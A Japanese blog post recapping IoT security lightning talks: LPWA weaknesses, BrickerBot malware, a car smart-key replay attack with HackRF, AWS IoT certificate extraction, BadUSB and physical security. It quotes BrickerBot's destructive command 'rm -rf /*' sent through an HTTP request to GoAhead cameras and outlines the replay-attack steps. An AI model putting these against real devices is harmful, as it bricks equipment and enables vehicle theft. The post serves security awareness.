    再送機能なし・ソフトウェアの更新なし
    ほとんどのSigfoxのデバイスでは暗号化がされていない

SIGFOXはよく名前を聞くだけに、基本は暗号化されてないんだ!と聞いてて驚きました……!!🌀

Sigfoxのセキュリティ上の懸念としては、上記からも分かる通り、
暗号化がオプションということです!⚡️
なので、ユーザ側で対策が必要ですということをおっしゃられていました🌸
Sigfox仕様自体は公開されていないのですが
セキュリティ機能についてはガイドラインが出されているので見てみると良いかもしれません✨

LoRaWanについては、
海外で既に攻撃事例がある(水道局💧)とのことでした!
LoRaゲートウェイに対して、無線通信を盗聴して得た情報を元になりすまして偽のデータを送ったり、偽装基地局を使ってシステムに送るデータを解析・改ざんしたり⚡️

LTEのセキュリティ上の懸念としては、
そこまで気にしなくていいけど通信データを改ざんされる可能性があるとのことでした!
攻撃者が用意したリレー装置に接続されてしまって、そのリレー装置が改ざんしてユーザに送られるなど・・・でもこれは簡単にはいかないそうです!💪


最後のまとめでは
・IoTシステムに対する攻撃の起点となる無線通信のセキュリティは大事
・無線通信色々あるけどそれぞれ懸念ポイントがあるので理解した上での実装が必要
・セキュリティ業界には無線屋が少ないので一緒にやりたい人はぜひ!
とのことでした🌻

個人的にLPWAの規格はちょうど気になってたところだったので、すごくテンションが上がりました!ありがとうございました✨



LT :宮本 浩二さん
BrickerBotの解説


「Mirai」に対抗する(?)マルウェアBrickerBotのお話しをされていました✨

〜BrickerBot出現の経緯〜

Miraiマルウェア(IoT機器のうち脆弱なものに感染を広げ、感染後Botとなり攻撃者の指示にしたがってDDoS攻撃を行う)が流行

これを見たJanit0rさん「Miraiを撲滅するためにBrickerBotを作った」

「脆弱な機器を放置してたらMiraiに感染して所有者が裁判の対象になるかもしれないから、その前にBrickerBotを感染させて使用不可能にさせよう」 的な発想らしいです🙄


〜BrickerBotの動作〜

サーバ上で動作(自己増殖機能なし)して、ファイルをftpで受けます。

攻撃対象の機器タイプごとにポート番号を切り替えて繋げていく

接続できると端末の側からコンソールでメッセージが出てくる
こういうメッセージが出てきたら〜〜っていう機種だろう!

デフォルトパスワードはこれだ!(100通りくらい)

という流れで接続するそうです⚡️
パスワード変えてる機器向けに、1300個くらいのリストも用意してるらしい!


GoAhead Webカメラ脆弱性をつくクラックの仕様もあって、 HTTP Requestを見てみると……

rm%20-rf%20/*

という怪しい文字列が🦉

これはコマンドに直すと、
rm -rf /*

これで二度と機器が立ち上がらないし、リセットボタンも無効になります!
まあ、、、確かにMiraiには感染しなくなりますね!(???)

他にも数十種類の機器についての無効手順(ディレクトリ削除以外も)も規定されているらしいです!


作者によると、1000万台以上の機器を無効化したらしいですが 、
100万台か200万台くらいじゃないかと言われているそうです!

でも100万台×5000円としても50億円の被害!大きい!


最近の製品にはパッチが当たっているとのことでした!
とっても面白いLTでした。ありがとうございました!!



LT : Yukiさん
(車の) スマートキー、リプレイ攻撃


車のAttack Vectorは多い!ということで、 今日はスマートキーに着目されていました🔑

〜検証内容〜
<車の開錠電波を傍受されてしまうと第三者に開錠されてしまうのか?>

被害者が立ち去った後に保存した開錠電波を送信して、開錠できるかを検証する内容でした。youtubeとかに既に動画が上がっているものを実際に検証されたそうです!


〜検証方法〜
・SDR sharp等を使ったりして、スマートキーの出力周波数を検出
 ●●MHzくらいが怪しい(一応隠しておきます)

・PCとHackRF Oneを接続して確認する
 GNU Radioで設定ファイルを作り設定すると、
 やはり●●MHzあたりに出力電波があるのでこれを保存

・HackRFで電波の送信もできるので、
 設定ファイルを作って同じような波形を送る


*どのくらいの距離が届くか?
 →約25mくらい電波が届いた
  電波を増幅すると30mくらい飛んだ

*一週間後とかにもう一度やったら?
 →これでも開錠できた
  (電波の中にタイムスタンプとかワンタイムパスワードとかはなさそう)


〜検証結果〜
開錠電波を傍受されるとリプレイ攻撃を実行され、開錠される危険性がある



個人的に、検証してみた系は大好きなのでとても楽しかったです🎵

あとは、ガジェットシェアリング勉強会というものがあるそうなので、
気になる方はIoTSecJPのSlackに入ってYukiさんにダイレクトメッセージを送ってくださいとのことです🌺

ありがとうございました🍰



LT :勝原 達也さん
IoTデバイス診断であった怖い話 - AWS IoT編 -


【更新】 スライドはこちらから!


以下、LT中の白百合のメモ(詳細はスライドをご覧くださいね)

今回はIoTにありがちな怖い脆弱性の話ということで、以下についてお話しいただきました🌼
・エッジデバイスも含めて一番弱いところが、システム全体の攻撃起点になる
AWSの設定ちゃんとしましょうね


とある「よくできた」IoTシステムに対する診断についてです。
IoT Gateway --MQTT-- AWS IoT Core

よくある仮説
記憶媒体に証明書を秘密鍵が保存されていそう

今回は大容量記憶媒体の代表格「eMMC
NANDコントローラのおかげで(低速で良いなら)少ない信号線で容易に読み書き可能
→実際にはそんなに簡単ではない

eMMCは基本的にはBGAパッケージであるため、ピンに直接アクセスできない
→壊すしかない
診断する時は2、3個預かって1個壊したりすることも!

抽出したデータに平文で鍵が入っているとは限らないけど、なんとかこっからこじ開けてやっていく!

苦労してクライアント証明書を秘密鍵を抽出できた!

AWS IoTへ接続する(MQTTプロトコル(Pub-Subメッセージ配信モデル))

取得した証明書を使って、
情報窃取したり、不正操作して例えば人の家の電気を勝手につけたりできる!
(ここら辺は画像見た方が良いのでスライドを見てください)



どうすればいいの?
・デバイスごとに証明書違うの使おう
・利用する証明書ごとに、アクセスするトピック階層を制限しよう

何すればいいの?
AWS IoT Policyでは
${iot:ClientId}のように変数を用いてポリシーを定義できる
ポリシーは、クライアント証明書は、デバイスのグループ単位で割り当てることができる

最重要だと思う変数
iot:Connection.Thing.IsAttached

この変数は、thingsの識別子を定義してそこにクライアント証明書を貼り付ける

接続できる状態になっているthingsはモノ識別子とクライアント証明書を持ってる
バイスの方もモノ識別子とクライアント証明書を持ってる

これが一致している場合のみtrue!!


どういう風にやったらいいか?
モノ識別子をトピック階層に含めアクセス制限しよう



という感じでした!
自分の知識が足りず、間違ったことを書いていたら教えてください……!

ありがとうございました!!



LT : 黒林檎さん
怪しいIoT機器の買い方


IoTはいろんなコンポーネントが大事になってくる!
勉強しても飽きないぞ

*どうやって勉強しよう?
 - 実際の製品を買ってハッキングすると早いぞ

*脆弱な電球を買うには?
  - 公開されているapkを解析することである程度開発者のセキュリティレベルを推測することができる


APIリクエストを見てどうするの?
  - リクエストをどんどん切っていく
  切っていくとバックドアっぽいのが出てきた!
  この電球のMACアドレスを与えるといい感じに制御できる👊


IPAさんに報告したらバックドア消えていた
この脆弱性はすでに修正されている

*黒林檎さんに感謝するには?
 - ハッシュタグ #黒林檎謝謝


本当にIoTセキュリティお好きなんだなというのが伝わってくるLTでした!
ありがとうございました!!



LT : 眞崎康平さん
魔改造PCで移動できるパスワード解析ハードを作りました

(今回はハード作成に集中)


✨改造ポイント✨
・小型ケースにいいグラボを押し込んでいる
GPU稼働メータもついてる(電流計がポコポコ動いて楽しい!)
・電力メータもついてる
・光る!

✨改造内容✨
GPUメータをつける

・(放熱のために)配線を整理する
  電流コネクタ編
   コネクタを抜いて配線を切り詰めてコンタクトを圧着
  信号ケーブル編

・温度センサをつける

・IoTっぽいこと
 デバイスの消費電力監視
 Modbusという産業用のインターフェイスから、
 変換器噛ませてマイコン繋げば、電圧電流消費電力……etc.が取れる!
 これを活用すれば興味のある機器がどれだけ消費電力をくっているかというのがわかるデバイスも作れる!


こちらも後ほどスライドをあげるそうなので、
詳しい部分はそちらをご覧ください🌺

改造はロマンですよね✨
ありがとうございました!!



LT :河野 悦昌さん
BadUSBとソーシャルハック


声が出ないとのことで、
キーボードで文字を打ったら超リアルに発声してくれるツール(多分本人の声)で
プレゼンをされていました!
あれが音声合成ソフトウェアと呼ばれるもの……?

スライドが高速で動いていたので詳細はメモできなかったのですが、
Arduinoを使ってBADUSBを作ろう!という内容でした。
大体こちらのような内容をお話しされていました⭐️
qiita.com

USBライトとかUSB充電器とかに仕込んでしまうと、
怪しくないと思ってついPCに繋げてしまう方も多いのではないでしょうか?

ハードウェア・ロジックボムを作ろうというので、
Arduino互換機やケーブル等がついたBADUSBセットが800円で売られていました🌸

実演では、
WindowsにBADUSB(Arduino)をさしたら、色んなプロセスが立ち上がったり、
「プログラムを指定して実行」が開いて文字列が入力され、
最終的にシャットダウンされてLTが終了しました🎩


LTの仕方が独特ですごくワクワクしました!!
ありがとうございました🌹



スポンサーLT :日本ハッカー協会
IoTの法的リスクのある活動


・IoTをやる上の最も恐ろしい法的リスクは?
 →わからない
  何が法的リスクになるのかさえわからない状態

色々なグレーゾーンがある
技適取ってない問題 - 海外の無線機器を使うと違法の可能性?
・ザルセキュリティのIoT機器アクセス問題
・この海外製品PSEマーク無いけどいいのか
・PL保険は必要なのか

IoTって怖い。ふと気がつくと捕まる!?
→そんなときに日本ハッカー協会(2018/9/13 設立)

・目的
 日本のハッカーがもっと活躍できる場を作る

・事業内容
 1, ハッカーを中心とした人材紹介事業(支援のお金を作るための手段としての事業)
 2, 登録ハッカーに対する弁護士費用助成事業(非営利)


*人材紹介事業について
・今はまだ求職者用の入力のみ可能
・大手企業とかだと採用条件に大卒以上とかあるけど、セキュリティやるのに学歴入ります?とか調整したりする(今のCTOとかセキュリティマネージャーやってる人は元無職とかニートとかの人もいる)
・職歴に空白がある人は就職が難しかったりするので、日本ハッカー協会の方で条件を調整する
・ここで作ったお金を、登録ハッカーに対する弁護士費用助成事業につなげる

*弁護士費用助成事業について
・従来の場合:逮捕→社会的に大ダメージ 
 IoTのセキュリティについてもグレーゾーンのまま進めると逮捕されてしまうことがあり得る
・協会に登録したハッカー不正アクセスなどで逮捕された場合に、弁護士費用を協会で一部助成してITに強い弁護士を紹介


・登録のメリット
 転職希望の方
 - 技術とマッチングした仕事はもちろん、ステータスをITスキルに全振りの方にも積極的に紹介してく

 転職希望でない方
  - ITに関する予期せぬ法的トラブルに巻き込まれた場合にはITに強い弁護士の紹介と費用の一部負担。今はまだお金がないため、5%〜10%の助成 (人材事業の方でお金が入ってこれば、100%を目指したい)


個人的にすごく聞きたかったLTだったので聞けてよかったです!
ありがとうございました!!



luminさん
IoTセキュリティは物理と化学から


*IoT機器は物理に弱い!(製造側の不具合含む)
・スマートロックが両面テープとかで開いたことがあった
・特大クリッパーで南京錠が開く
……etc.

*IoTは電子機器だから水が危ない!
ブイが浸水の話をされていました🌊
・浸水した基板ダメージは大きかった
・通電していたために、電気的な端子が溶けていた
・IoT機器を屋外で使うのは難しい……

*対策
・目立たない場所に移動
・Zip Lockとタッパー2重で防止

*まとめ
IoT機器の物理対策は防ぎにくい

重要なのは
・いたずら防止
・物理アクセスの制限
・盗難防止(結構持っていかれる)
・費用対効果
 (1万円くらいのものにセキュリティ対策10万円くらいかけてもしょうがない!)


今までのLTとはちょっと違った物理の視点で面白かったです!
ありがとうございました!!




LTは以上のような感じでした💕
フォーマットめちゃくちゃだしうまくまとめられてなくて申し訳ないです(それぞれのLTの雰囲気に合わせたらこうなってしまった)
精進しよう……!

あとは懇親会でも色々とお話しさせていただきました✨
普段、セキュリティ技術!!!という雰囲気の勉強会に参加させていただくことが多いのですが、今回はIoTLTが主体ということもあり、参加者の層も違う感じで面白かったです!

コミュ障爆発させてたのに、
皆さん優しくお話ししてくださってありがとうございました😭

冒頭でも触れましたが今までIoTにはあまり触れてこなかったので、
これを機に色々と学んでいけたらと思います🎀

最後はアイキャッチ用の、一昨日買ったダリアを貼ってお別れです❤️
これからもよろしくお願いします!!

f:id:white-lily6u6:20180915094830j:plain:w300